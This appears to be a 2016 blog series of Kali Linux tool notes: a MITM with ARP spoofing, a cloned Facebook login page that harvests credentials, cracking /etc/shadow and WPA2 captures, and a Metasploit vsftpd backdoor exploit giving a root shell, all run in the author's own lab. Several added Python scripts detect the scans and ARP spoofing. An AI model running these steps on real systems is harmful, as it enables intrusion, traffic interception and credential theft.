Wednesday, March 30, 2016

Kali Tool Series - Websploit

Although there seem to be handier tools for web exploits than Websploit, it still interests me because its interface is similar to Metasploit's.

To Start

> websploit

 __    __    ___  ____    _____ ____  _       ___  ____  ______
|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |
 \      / |     ||     | \    ||  |  |     ||     ||  |   |  |
  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|


                --=[WebSploit FrameWork
        +---**---==[Version :2.0.5 BETA
        +---**---==[Codename :We're Not Crying Wolf
        +---**---==[Available Modules : 19
                --=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules            Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here, I am going to try some modules in Websploit. The target will be my own Metasploitable2 virtual machine. Make sure you don't try any of the actions described here on a running machine that doesn't belong to you.

Scan Directories

We brute-force directory names on the target machine with HTTP requests. As far as I know, DirBuster is also well known for this job. Note that this activity is easy for the target machine to notice, since lots of requests for non-existent paths are sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options          Value
---------       --------------
TARGET          http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET =>  192.168.63.156

wsf > run
…

However, I don't think the program does a good job: it doesn't print results as it goes, so the user has to wait until the scan has completed, and that usually takes a long time.
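As an added defender-side example (not part of the original post or of Websploit), the following Python script shows how the target notices such a scan: it parses Apache combined-format access-log lines and flags any client that accumulates many 404 responses inside a short sliding window. The log lines, client IPs, window and threshold are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of Apache combined-format access log lines (not real
# traffic). 192.168.63.155 fires six requests for paths that do not exist
# within three seconds; 192.168.63.10 is an ordinary visitor.
SAMPLE_LOG = """\
192.168.63.155 - - [30/Mar/2016:17:20:01 +0800] "GET /admin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.63.155 - - [30/Mar/2016:17:20:01 +0800] "GET /backup/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.63.155 - - [30/Mar/2016:17:20:02 +0800] "GET /cgi-bin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.63.155 - - [30/Mar/2016:17:20:02 +0800] "GET /config/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.63.155 - - [30/Mar/2016:17:20:03 +0800] "GET /db/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.63.155 - - [30/Mar/2016:17:20:03 +0800] "GET /test/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.63.155 - - [30/Mar/2016:17:20:04 +0800] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.63.10 - - [30/Mar/2016:17:21:10 +0800] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.63.10 - - [30/Mar/2016:17:25:42 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_dir_bruteforce(lines, window_seconds=60, threshold=20):
    """Return {ip: peak 404 count} for clients whose number of 404 responses
    inside any sliding window of window_seconds reaches threshold."""
    times_by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is not None and ev["status"] == 404:
            times_by_ip[ev["ip"]].append(ev["time"])

    flagged = {}
    for ip, times in times_by_ip.items():
        times.sort()
        window = deque()
        peak = 0
        for t in times:
            window.append(t)
            # Drop events that fell out of the window ending at t.
            while (t - window[0]).total_seconds() > window_seconds:
                window.popleft()
            peak = max(peak, len(window))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    # Small window and threshold so the constructed sample trips the detector.
    for ip, count in detect_dir_bruteforce(SAMPLE_LOG.splitlines(), 10, 5).items():
        print(f"{ip}: {count} responses of 404 within 10 s")
```

On a real server the defaults (20 misses per minute) are a reasonable starting point; the scanner in this post would exceed them within its first second, while the ordinary visitor's single 404 never registers.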

Man in the Middle

Man in the Middle is an interesting attack. The attacker stays silent, intercepts the victim's network traffic, and passes it on. That is, the victim may not notice that his/her traffic is being completely monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options          Value                           RQ      Description
---------       --------------                  ----    --------------
Interface       eth0                            yes     Network Interface Name
ROUTER          192.168.1.1                     yes     Router IP Address
TARGET          192.168.1.2                     yes     Target IP Address
SNIFFER         driftnet                        yes     Sniffer Name (Select From Sniffer List)
SSL             true                            yes     SSLStrip, For SSL Hijacking(true or false)


Sniffers         Description
------------    --------------
dsniff           Sniff All Passwords
msgsnarf         Sniff All Text Of Victim Messengers
urlsnarf         Sniff Victim Links
driftnet         Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET =>  192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER =>  192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then the victim starts to browse the Internet. I'm letting the victim run wget google.com to simulate Internet surfing.

Back on the attacker side, here's what he/she received:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"
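The ARP spoofing step is what a defender on the victim's side can catch. As an added example, not code from the post or from Websploit, this Python script takes snapshots of the victim's ARP table in /proc/net/arp format, compares the gateway's MAC against a recorded baseline and flags any MAC that claims more than one IP, which is what the poisoned table looks like while the MITM runs. The snapshots, the MAC addresses, the gateway address 192.168.63.1 and the baseline are constructed assumptions.

```python
from collections import defaultdict

# Constructed snapshots of the victim's ARP table in /proc/net/arp format
# (MAC addresses are made up). 192.168.63.1 is assumed to be the gateway.
ARP_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.63.1     0x1         0x2         00:0c:29:aa:bb:01     *        eth0
192.168.63.155   0x1         0x2         00:0c:29:aa:bb:02     *        eth0
"""

ARP_AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.63.1     0x1         0x2         00:0c:29:aa:bb:02     *        eth0
192.168.63.155   0x1         0x2         00:0c:29:aa:bb:02     *        eth0
"""

# Baseline recorded while the network was known to be clean (assumed values).
KNOWN_GOOD = {"192.168.63.1": "00:0c:29:aa:bb:01"}


def parse_proc_net_arp(text):
    """Map IP -> lower-case MAC from /proc/net/arp style text (header skipped)."""
    table = {}
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 6:
            continue
        ip, mac = parts[0], parts[3].lower()
        if mac != "00:00:00:00:00:00":  # incomplete entries carry a zero MAC
            table[ip] = mac
    return table


def audit_arp_table(table, known_good):
    """Return alert strings for baseline mismatches and MACs claiming several IPs."""
    alerts = []
    for ip, expected in known_good.items():
        seen = table.get(ip)
        if seen is not None and seen != expected.lower():
            alerts.append(f"{ip} now maps to {seen}, expected {expected}")
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts


def audit_snapshot(text, known_good):
    """Parse one snapshot and audit it against the baseline."""
    return audit_arp_table(parse_proc_net_arp(text), known_good)


if __name__ == "__main__":
    for name, snapshot in (("before", ARP_BEFORE), ("after", ARP_AFTER)):
        print(name, audit_snapshot(snapshot, KNOWN_GOOD) or ["ok"])
```

On a live Linux host you would feed the contents of /proc/net/arp to audit_snapshot() periodically; a static ARP entry for the gateway, or an ARP monitor such as arpwatch, is the usual mitigation once this kind of change is confirmed.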

Tuesday, March 29, 2016

Kali Tool Series - Maltego

Maltego is a reconnaissance tool built into Kali and developed by Paterva. It is a powerful information gathering tool that covers everything from Internet infrastructure to personal information and social networks.

Palette

Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. Each object type represents a real-world item and carries relevant attributes. By running transform actions, we can expand one object into the whole network of interest.
In Maltego, we have the following types in the Palette:
  • Device
  • Infrastructure
    • AS
    • DNS Name
    • Domain
    • IPv4 Address
    • MX Record
    • NS Record
    • Netblock
    • URL
    • UniqueIdentifier
    • Website
  • Locations
    • Circular Area
    • GPS Coordinate
    • Location
  • Personal
    • Alias
    • Document
    • Email Address
    • Image
    • Person
    • Phone Number
    • Phrase
  • Social Network
    • Facebook
    • Twitter

Steps

Step 1 - Open Maltego
Open Maltego from Application menu → Information Gathering → Maltego (or just type maltego in a terminal), then register an account and select the transform seeds to install.
Step 2 - Pick a Start Node
You can start from a website URL, a person, or anything mentioned above in the Palette.
Step 3 - Expand
Right-click the object and run a “transform” action, which expands the graph by adding connections to other objects.

Example Output

Information gathering starting from my domain, heron.me.

Information gathering starting from me, "Heron Yang".

Transform Seeds

Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book, which you use to see where the relevant content is located.

Friday, March 25, 2016

Kali Tool Series - The Social-Engineer Toolkit

Preface

“Social engineering” is a sub-field of network security. It is much less about technical matters and more about deceiving people in order to get into a system without authorization.

The content here is only for study purposes; one SHOULD NOT deploy it in a real-world environment, which is illegal. While you practice, make sure you test on your own machines only and don't defraud people.

Build a Phishing Website

As the basic example, we build a fake login website that captures the username and password people enter.
> setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.
  
set> 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack> 3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
Then it asks for the IP of your Kali machine, which you can find with the ifconfig command. Mine is 192.168.63.155.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo
  
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Now you're all set. By default, the files are generated in /var/www/. However, we have to move them into /var/www/html/, which is Apache's default document root.
> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
Okay, then open the URL (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.

Finally, you will find the username and password in the harvester_….txt file:
> cat /var/www/html/har*.txt
Array
(
    [lsd] => AVqaOX85
    [display] =>
    [enable_profile_selector] =>
    [isprivate] =>
    [legacy_return] => 1
    [profile_selector_ids] =>
    [skip_api_login] =>
    [signed_next] =>
    [trynum] => 1
    [timezone] => -825
    [lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
    [lgnrnd] => 194144_MLVw
    [lgnjs] => 1458894004
    [email] => apple
    [pass] => banana
    [login] => 1
    [default_persistent] => 0
    [qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)

Saturday, March 19, 2016

Kali Tool Series - John the Ripper

John the Ripper is a tool for recovering passwords by brute force. Make sure you don't apply any of the following to other people's accounts or services; try it only on your own accounts or services.

Get Password of an Unix-like Machine

The following only works on a Unix-like machine where the user has already gained access to its files. That is, we need /etc/passwd and /etc/shadow (only /etc/passwd for ancient machines).

> unshadow /etc/passwd /etc/shadow > ~/passwd

Use John’s default word list to crack the password:

> john ~/passwd

Use custom wordlist:

> john --wordlist=word.list ~/passwd

where word.list is your custom list.

To show the result:

> john --show ~/passwd

Crack Wifi

Use Wordlist (WPA2)

Use Wireshark or airodump-ng to capture a .cap file of the traffic. Then:

> aircrack-ng -w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap

where the -b option gives the BSSID (MAC address) of the target access point, and the input files are the .cap files.

Try All

Another solution is to try every possible password, which is guaranteed to find the password eventually but might also take forever.

> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap

Session Control

To run a long password-testing process, we can make it run in the background:

> john --session=all_rules_session --wordlist=all.lst ~/passwd &

To check the session status:

> john --status=all_rules_session
0g 0:00:00:02  2/3 0g/s 411.5p/s 411.5c/s 411.5C/s

To restore the session:

> john --restore
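To make the unshadow step and the status line concrete, here is an added Python example (my own code for this post, not John's): unshadow() merges constructed /etc/passwd and /etc/shadow excerpts the way unshadow(8) does, parse_status() reads the cracked count, elapsed time and c/s rate out of a --status line like the one above, and estimate_seconds() turns a wordlist size into a time-to-exhaust, which is the number a defender uses when judging whether a password policy holds up against a given cracking rate. The accounts, the hash placeholders and the 14-million-entry wordlist size are assumptions.

```python
import re

# Constructed /etc/passwd and /etc/shadow excerpts (fake accounts; the hash
# fields are placeholders, not real crypt(3) hashes).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
"""

SHADOW = """\
root:$6$PLACEHOLDER_ROOT_HASH:16800:0:99999:7:::
alice:$6$PLACEHOLDER_ALICE_HASH:16800:0:99999:7:::
nobody:*:16800:0:99999:7:::
"""


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): replace passwd's second field with the shadow hash."""
    hashes = {}
    for line in shadow_text.splitlines():
        if ":" in line:
            user, hash_field = line.split(":", 2)[:2]
            hashes[user] = hash_field
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


STATUS_RE = re.compile(
    r"^(?P<cracked>\d+)g\s+(?P<elapsed>\d+:\d{2}:\d{2}:\d{2}).*?"
    r"(?P<cps>\d+(?:\.\d+)?)(?P<unit>[KMG]?)c/s"
)
UNIT = {"": 1, "K": 1_000, "M": 1_000_000, "G": 1_000_000_000}


def parse_status(line):
    """Parse a john --status line such as
    '0g 0:00:00:02  2/3 0g/s 411.5p/s 411.5c/s 411.5C/s' into the cracked
    count, elapsed seconds and the c/s rate (candidate hashes per second)."""
    m = STATUS_RE.match(line.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) for x in m.group("elapsed").split(":"))
    return {
        "cracked": int(m.group("cracked")),
        "elapsed_seconds": ((days * 24 + hours) * 60 + minutes) * 60 + seconds,
        "cps": float(m.group("cps")) * UNIT[m.group("unit")],
    }


def estimate_seconds(candidates, cps):
    """Seconds needed to try `candidates` guesses at `cps` candidates per second."""
    return candidates / cps


if __name__ == "__main__":
    for entry in unshadow(PASSWD, SHADOW):
        print(entry)
    status = parse_status("0g 0:00:00:02  2/3 0g/s 411.5p/s 411.5c/s 411.5C/s")
    # Assumed wordlist size: roughly 14 million entries (rockyou-sized).
    hours = estimate_seconds(14_000_000, status["cps"]) / 3600
    print(f"about {hours:.1f} hours to exhaust a 14M-entry wordlist at {status['cps']} c/s")
```

At the 411.5 c/s shown in the status line above, a 14-million-entry wordlist takes roughly nine and a half hours for one hash; the same arithmetic with a GPU rate in the millions per second is why slow hashes and long passphrases matter more than a clever wordlist.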

Password Wordlist

Longer wordlists can be found online. However, Kali already ships several wordlists for users to apply.

> ls /usr/share/wordlists/
dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  metasploit  metasploit-jtr  nmap.lst  rockyou.txt.gz  sqlmap.txt  termineter.txt  wfuzz

They are wordlist files from different applications:

> file /usr/share/wordlists/*
/usr/share/wordlists/dirb:           symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster:      symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz:          symbolic link to /usr/share/wfuzz/wordlist

Interestingly, the best wordlist is actually the compressed rockyou.txt.gz, so:

> gzip -dc < rockyou.txt.gz > ~/wordlist.txt

and then we have wordlist.txt.

Monday, March 14, 2016

Kali Tool Series - Nessus

Nessus is an open source vulnerability scanner, which scans a network for potential security risks and provides detailed reports.
A few facts about Nessus:
  • founded by Renaud Deraison in 1998
  • supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc

Feature

  • host/port discovery
  • identifies vulnerabilities
  • checks whether the systems have the latest software patches
  • tries with default passwords, common passwords on system accounts
  • malware/botnet detection
(from reference 1 and reference 2)

Install and Setup

Download Nessus from its official site (registration is required; the Home version is free).
After installation, open https://localhost:8834/ on your machine to start Nessus.

Component

  • Reports: reports from all the past scans of a target or a set of targets
  • Scans: configure or run a new scan
  • Policies: configure the things you would like to run for the scans
  • Users: different users may have different permissions to apply different policies
(Reference)

Policy

Open https://localhost:8834/, and click on “+New Policy” button in the Policy tab.
Information about the scanner templates provided by the policy wizard can be found here.

Settings

  • Basics
    • general: name / description
    • permission: private / share
  • Discovery: host discovery / port scanning / service discovery
  • Assessment: for “web application” only
  • Report: configure the scan reports
  • Advanced: performance settings, additional checks, and logging features

Scan

Click the “+New Scan” button, then pick a scanner template or a user-created policy.

General

  • name
  • description
  • folder
  • scanner
  • targets: IP or domain name (ex. 192.168.1.0/24, 192.168.2.1, example.com)
  • upload targets: a file that contains target list

Schedule

Default is disabled.
  • launch: pick its frequency - once, daily, weekly, monthly, or yearly
  • starts on: start time
  • time zone
  • summary

Email Notification

Setting up SMTP is required.

Launch

Click the play icon or the “Launch” button, and the scan starts immediately.

View Results

The result page has:

  • Configure: directs back to the scan settings
  • Audit Trail: pulls up the audit trail dialogue
  • Launch
  • Export: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.

Turn On/Off Nessus

Nessus runs as a background service by default. On macOS, to turn it on:
sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
To turn it off:
sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist

Saturday, March 12, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security professionals to perform security assessments.

Few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it's worth knowing that a successful service exploitation requires the following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before starting, it helps to briefly understand its modules, which can be roughly grouped as follows (reference is here):

Auxiliary modules

Useful tools for things like:

  • information gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Payloads that run on the system after exploitation. In Metasploit, it's better to use the “meterpreter” payload, which sets up a Meterpreter session (a backdoor) smoothly.

Testing Environment

Okay, since what we are doing here may cause changes (or you could say damage) on the target machine, we can't do this on a deployed machine without permission. Therefore, I set up a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.0.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine, since the others don't look like normal devices.

Alternatively, of course, Nmap can do all the work for this part:

nmap -v -sV 192.168.63.1/24

Port Scanning

Then, we scan the open ports of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
   THREADS      50               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (omitted)

By knowing which ports the machine is using, we can know which services are running on it.

2. Find Vulnerability

To find a vulnerability, we need to know the version of the service and look it up in a database to see whether there is any known vulnerability.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let's focus on vsFTPd, which is more likely to be vulnerable compared to SSH. So, go to exploit-db, search for the keyword “vsFTPd”, and luckily we find “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum up what we have so far: the target machine is running an outdated service that contains a well-known flaw.
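As an added example (not the post's or Metasploit's code), the following Python script does programmatically what the manual exploit-db lookup above does by hand: it extracts product and version from the FTP and SSH banners returned by the version scanners and looks the pair up in a known-issues table, which is the core of what a vulnerability scanner like Nessus does with a banner. The table is constructed; its only real entry is the vsFTPd 2.3.4 finding named above, and the ProFTPD banner in the usage is a made-up sample.

```python
import re

# Constructed lookup table: (product in lower case, exact version) -> issue
# title. The vsFTPd entry mirrors the exploit-db title quoted in the post and
# is the only real entry.
KNOWN_ISSUES = {
    ("vsftpd", "2.3.4"): "VSFTPD 2.3.4 - Backdoor Command Execution",
}

# "220 (vsFTPd 2.3.4)" or "220 ProFTPD 1.3.1 Server (Debian)"
FTP_BANNER_RE = re.compile(r"^220[ -]\(?(?P<product>[A-Za-z][\w-]*)[ /_-](?P<version>\d[\w.]*)")
# "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1"
SSH_BANNER_RE = re.compile(r"^SSH-[\d.]+-(?P<product>[A-Za-z]+)[_-]?(?P<version>\d[\w.]*)")


def parse_banner(service, banner):
    """Return (product, version) from an FTP 220 greeting or an SSH
    identification string, or None if the banner is not recognised."""
    if isinstance(banner, bytes):
        banner = banner.decode("ascii", errors="replace")
    banner = banner.strip()
    regex = {"ftp": FTP_BANNER_RE, "ssh": SSH_BANNER_RE}.get(service)
    if regex is None:
        return None
    m = regex.match(banner)
    if not m:
        return None
    return m.group("product"), m.group("version")


def assess_banner(service, banner):
    """Parse the banner and look the (product, version) pair up in KNOWN_ISSUES."""
    parsed = parse_banner(service, banner)
    if parsed is None:
        return None
    product, version = parsed
    return {
        "product": product,
        "version": version,
        "issue": KNOWN_ISSUES.get((product.lower(), version)),
    }


if __name__ == "__main__":
    # The two banners the scanners returned above, plus a made-up ProFTPD one.
    samples = [
        ("ftp", b"220 (vsFTPd 2.3.4)\r\n"),
        ("ssh", b"SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n"),
        ("ftp", b"220 ProFTPD 1.3.1 Server (Debian)\r\n"),
    ]
    for service, banner in samples:
        print(service, assess_banner(service, banner))
```

Exact-version matching is deliberately strict here: real scanners also have to deal with distribution backports (the Debian suffix on the OpenSSH banner is the hint), which is why a banner match is a lead to verify rather than a confirmed finding.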

Find the Exploit Method

Then, let's search for it in Metasploit:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.63.156   yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

There's only one payload we can apply to this exploit, cmd/unix/interact, which means that the interactive shell is set up directly after exploitation.

Now we run it, and it succeeds:

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
